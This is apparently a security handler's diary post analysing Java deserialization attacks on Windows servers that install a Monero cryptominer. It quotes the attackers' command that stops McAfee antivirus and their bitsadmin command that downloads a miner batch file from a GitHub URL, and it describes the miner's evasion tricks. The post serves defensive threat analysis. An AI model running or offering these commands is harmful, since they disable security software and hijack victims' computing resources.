Recently we talked a lot about attacks exploiting Java deserialization vulnerabilties in systems like Apache SOLR and WebLogic. Most of these attacks targeted Linux/Unix systems. But recently, I am seeing more attacks that target windows. For example:
The actual payload: Turn off McAfee Antivirus (I am not sure what they only turn off McAfee. Any ideas?) net stop "McAfee McShield; Use bitsadmin to download the cryptominer and a batch file to start it from GitHub bitsadmin.exe /transfer "xmrig.bat" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat "%cd%\xmrig.bat"; The Batch file: First, it kills other xmrig processes (competition?) . Next, it again turns of McAfee. It then starts the miner and connects to the monerohash.com pool on port 3333. It only uses 50% of the CPU usage, likely to evade detection. So far, this miner only "owns" about 350 Hashes/Second, and made a bit short of 40 Monero so far (about $ 7,000) .
--- |
Johannes 4075 Posts ISC Handler Apr 3rd 2018 |
Thread locked Subscribe |
Apr 3rd 2018 2 years ago |
Sign Up for Free or Log In to start participating in the conversation!